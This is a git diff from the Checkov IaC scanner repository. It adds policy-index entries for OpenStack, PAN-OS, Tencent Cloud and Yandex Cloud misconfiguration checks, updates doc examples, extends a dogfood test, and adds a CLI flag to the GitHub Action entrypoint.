[SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | +| 2063 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | +| 2064 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | 
Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) | +| 2065 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) | +| 2066 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) | +| 2067 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) | +| 2068 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) | +| 2069 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | +| 2070 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | +| 2071 | CKV_PAN_5 | resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | 
[PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 2072 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 2073 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 2074 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | +| 2075 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 2076 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | +| 2077 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 2078 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within 
security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | +| 2079 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 2080 | CKV_PAN_9 | resource | panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | +| 2081 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 2082 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | +| 2083 | CKV_PAN_11 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 2084 | CKV_PAN_11 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure encryption algorithms | Terraform | [NetworkIPsecAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAlgorithms.py) | +| 2085 | CKV_PAN_12 | resource | panos_ipsec_crypto_profile | Ensure IPsec 
profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 2086 | CKV_PAN_12 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure authentication algorithms | Terraform | [NetworkIPsecAuthAlgorithms.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecAuthAlgorithms.py) | +| 2087 | CKV_PAN_13 | resource | panos_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 2088 | CKV_PAN_13 | resource | panos_panorama_ipsec_crypto_profile | Ensure IPsec profiles do not specify use of insecure protocols | Terraform | [NetworkIPsecProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/NetworkIPsecProtocols.py) | +| 2089 | CKV_PAN_14 | resource | panos_panorama_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 2090 | CKV_PAN_14 | resource | panos_zone | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 2091 | CKV_PAN_14 | resource | panos_zone_entry | Ensure a Zone Protection Profile is defined within Security Zones | Terraform | [ZoneProtectionProfile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneProtectionProfile.py) | +| 2092 | CKV_PAN_15 | resource | 
panos_panorama_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 2093 | CKV_PAN_15 | resource | panos_zone | Ensure an Include ACL is defined for a Zone when User-ID is enabled | Terraform | [ZoneUserIDIncludeACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/ZoneUserIDIncludeACL.py) | +| 2094 | CKV_TC_1 | resource | tencentcloud_cbs_storage | Ensure Tencent Cloud CBS is encrypted | Terraform | [CBSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CBSEncryption.py) | +| 2095 | CKV_TC_2 | resource | tencentcloud_instance | Ensure Tencent Cloud CVM instance does not allocate a public IP | Terraform | [CVMAllocatePublicIp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMAllocatePublicIp.py) | +| 2096 | CKV_TC_3 | resource | tencentcloud_instance | Ensure Tencent Cloud CVM monitor service is enabled | Terraform | [CVMDisableMonitorService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMDisableMonitorService.py) | +| 2097 | CKV_TC_4 | resource | tencentcloud_instance | Ensure Tencent Cloud CVM instances do not use the default security group | Terraform | [CVMUseDefaultSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultSecurityGroup.py) | +| 2098 | CKV_TC_5 | resource | tencentcloud_instance | Ensure Tencent Cloud CVM instances do not use the default VPC | Terraform | [CVMUseDefaultVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUseDefaultVPC.py) | +| 2099 | CKV_TC_6 | resource | tencentcloud_kubernetes_cluster | Ensure Tencent Cloud TKE 
clusters enable log agent | Terraform | [TKELogAgentEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/TKELogAgentEnabled.py) | +| 2100 | CKV_TC_7 | resource | tencentcloud_kubernetes_cluster | Ensure Tencent Cloud TKE cluster is not assigned a public IP address | Terraform | [TKEPublicIpAssigned.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/TKEPublicIpAssigned.py) | +| 2101 | CKV_TC_8 | resource | tencentcloud_security_group_rule_set | Ensure Tencent Cloud VPC security group rules do not accept all traffic | Terraform | [VPCSecurityGroupRuleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/VPCSecurityGroupRuleSet.py) | +| 2102 | CKV_TC_9 | resource | tencentcloud_mysql_instance | Ensure Tencent Cloud mysql instances do not enable access from public networks | Terraform | [CDBInternetService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CDBInternetService.py) | +| 2103 | CKV_TC_10 | resource | tencentcloud_mysql_instance | Ensure Tencent Cloud MySQL instances intranet ports are not set to the default 3306 | Terraform | [CDBIntranetPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CDBIntranetPort.py) | +| 2104 | CKV_TC_11 | resource | tencentcloud_clb_instance | Ensure Tencent Cloud CLB has a logging ID and topic | Terraform | [CLBInstanceLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CLBInstanceLog.py) | +| 2105 | CKV_TC_12 | resource | tencentcloud_clb_listener | Ensure Tencent Cloud CLBs use modern, encrypted protocols | Terraform | [CLBListenerProtocol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CLBListenerProtocol.py) | +| 2106 | CKV_TC_13 | resource | tencentcloud_instance 
| Ensure Tencent Cloud CVM user data does not contain sensitive information | Terraform | [CVMUserData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUserData.py) | +| 2107 | CKV_TC_14 | resource | tencentcloud_vpc_flow_log_config | Ensure Tencent Cloud VPC flow logs are enabled | Terraform | [VPCFlowLogConfigEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/VPCFlowLogConfigEnable.py) | +| 2108 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | +| 2109 | CKV_TF_2 | module | module | Ensure Terraform module sources use a tag with a version number | Terraform | [RevisionVersionTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionVersionTag.py) | +| 2110 | CKV_YC_1 | resource | yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2111 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2112 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2113 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. 
| Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2114 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2115 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2116 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2117 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2118 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 2119 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | +| 2120 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. 
| Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | +| 2121 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | +| 2122 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | +| 2123 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | +| 2124 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | +| 2125 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | +| 2126 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | +| 2127 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. 
| Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | +| 2128 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | +| 2129 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2130 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2131 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2132 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2133 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2134 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. 
| Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2135 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2136 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 2137 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 2138 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 2139 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | +| 2140 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | +| 2141 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. 
| Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | +| 2142 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. | Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | +| 2143 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | +| 2144 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | +| 2145 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | +| 2146 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 2147 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. 
| Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 2148 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. | Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | +| 2149 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 2150 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 2151 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2152 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2153 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. 
Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2154 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2155 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 2156 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | --- diff --git a/docs/6.Contribution/Contribution Overview.md b/docs/6.Contribution/Contribution Overview.md index 35cd4ac564e..55898cf0f62 100644 --- a/docs/6.Contribution/Contribution Overview.md +++ b/docs/6.Contribution/Contribution Overview.md 
@@ -100,7 +100,7 @@ Let's assume we're trying to create a new AWS resource Check to ensure all of ou ``` $ pytest -k test_CheckovIsAwesome ================================================================================ test session starts ================================================================================ - platform darwin -- Python 3.7.11, pytest-6.2.5, py-1.10.0, pluggy-1.0.0 + platform darwin -- Python 3.10.14, pytest-6.2.5, py-1.10.0, pluggy-1.0.0 rootdir: /path/to/checkov plugins: xdist-2.4.0, forked-1.3.0, cov-3.0.0 collected 1952 items / 1951 deselected / 1 selected @@ -162,7 +162,7 @@ Let's assume we're trying to create a new AWS resource Check to ensure all of ou ``` $ pytest -k test_CheckovIsAwesome ================================================================================ test session starts ================================================================================ - platform darwin -- Python 3.7.11, pytest-6.2.5, py-1.10.0, pluggy-1.0.0 + platform darwin -- Python 3.10.14, pytest-6.2.5, py-1.10.0, pluggy-1.0.0 rootdir: /Users/joseph.meredith/dev/jmeredith18/checkov plugins: xdist-2.4.0, forked-1.3.0, cov-3.0.0 collected 1952 items / 1951 deselected / 1 selected diff --git a/docs/7.Scan Examples/Git History.md b/docs/7.Scan Examples/Git History.md index 55020f59a5e..2d947e72f37 100644 --- a/docs/7.Scan Examples/Git History.md +++ b/docs/7.Scan Examples/Git History.md @@ -20,12 +20,12 @@ Use `--secrets-history-timeout` to set how long the secrets scan will run on his A run with a timeout of `12h` by default: ```bash -checkov -d --scan-secrets-history --bc-api-key +checkov -d --scan-secrets-history --bc-api-key --repo-id ``` A run with a timeout of `1h`: ```bash -checkov -d --scan-secrets-history --secrets-history-timeout 1h --bc-api-key +checkov -d --scan-secrets-history --secrets-history-timeout 1h --bc-api-key --repo-id ``` ### Example output 
diff --git a/docs/7.Scan Examples/Sca.md b/docs/7.Scan Examples/Sca.md index b368495a3cf..3cc02718965 100644 --- a/docs/7.Scan Examples/Sca.md +++ b/docs/7.Scan Examples/Sca.md @@ -14,7 +14,7 @@ In order to use this feature, you first need to create an [API token using Prism ## Package scanning ```bash -checkov -d . --framework sca_package --bc-api-key :: --prisma-api-url +checkov -d . --framework sca_package --bc-api-key :: --prisma-api-url --repo-id ``` ### Example output diff --git a/dogfood_tests/test_checkov_dogfood.py b/dogfood_tests/test_checkov_dogfood.py index 8838da4a025..8a5bebe18a2 100644 --- a/dogfood_tests/test_checkov_dogfood.py +++ b/dogfood_tests/test_checkov_dogfood.py @@ -56,6 +56,8 @@ def test_all_frameworks_are_tested() -> None: CheckType.SAST_JAVA, CheckType.SAST_PYTHON, CheckType.SAST_JAVASCRIPT, + CheckType.SAST_TYPESCRIPT, + CheckType.SAST_GOLANG, CheckType.SECRETS, CheckType.SERVERLESS, CheckType.TERRAFORM, diff --git a/github_action_resources/entrypoint.sh b/github_action_resources/entrypoint.sh index a9072eacf14..93ed806318f 100755 --- a/github_action_resources/entrypoint.sh +++ b/github_action_resources/entrypoint.sh @@ -31,6 +31,7 @@ fi [[ -n "$INPUT_HARD_FAIL_ON" ]] && HARD_FAIL_ON_FLAG="--hard-fail-on $INPUT_HARD_FAIL_ON" [[ -n "$INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT" ]] && INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT_FLAG="--repo-root-for-plan-enrichment $INPUT_REPO_ROOT_FOR_PLAN_ENRICHMENT" [[ -n "$INPUT_POLICY_METADATA_FILTER" ]] && POLICY_METADATA_FILTER_FLAG="--policy-metadata-filter $INPUT_POLICY_METADATA_FILTER" +[[ -n "$INPUT_POLICY_METADATA_FILTER_EXCEPTION" ]] && POLICY_METADATA_FILTER_EXCEPTION_FLAG="--policy-metadata-filter-exception $INPUT_POLICY_METADATA_FILTER_EXCEPTION" if [ -n "$INPUT_OUTPUT_BC_IDS" ] && [ "$INPUT_OUTPUT_BC_IDS" = "true" ]; then OUTPUT_BC_IDS_FLAG="--output-bc-ids" 
